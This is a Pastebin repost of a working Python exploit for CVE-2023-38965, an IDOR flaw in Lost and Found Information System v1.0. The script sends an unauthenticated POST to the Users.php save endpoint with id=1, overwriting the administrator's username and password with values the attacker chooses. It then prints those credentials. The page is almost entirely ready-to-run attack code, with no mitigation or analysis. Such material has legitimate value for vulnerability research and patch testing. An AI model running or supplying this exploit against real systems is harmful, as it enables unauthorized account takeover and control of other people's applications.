API tools faq
paste
Advertisement
FlyFar

Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over - CVE-2023-38965

FlyFar
Feb 14th, 2024
1,543
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.98 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
  2. # Date: 2023-07-16
  3. # Exploit Author: OR4NG.M4N
  4. # Category : webapps
  5. # Tested on: Windows/Linux
  6.  
  7. Python p0c :
  8.  
  9. import argparse
  10. import requests
  11. import time
  12. parser = argparse.ArgumentParser(description='Send a POST request to the target server')
  13. parser.add_argument('-url', help='URL of the target', required=True)
  14. parser.add_argument('-user', help='Username', required=True)
  15. parser.add_argument('-password', help='Password', required=True)
  16. args = parser.parse_args()
  17.  
  18.  
  19. url = args.url + '/classes/Users.php?f=save'
  20.  
  21.  
  22. data = {
  23.     'id': '1',
  24.     'firstname': 'Az7rb',
  25.     'middlename': '',
  26.     'lastname': 'Admin',
  27.     'username': args.user,
  28.     'password': args.password
  29. }
  30.  
  31. response = requests.post(url, data)
  32. if b"1" in response.content:
  33.     print("Exploit ..")
  34.     time.sleep(1)
  35.     print("User :" + args.user + "\nPassword :" + args.password)
  36. else:
  37.     print("Exploit Failed..")
Tags: CVE Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!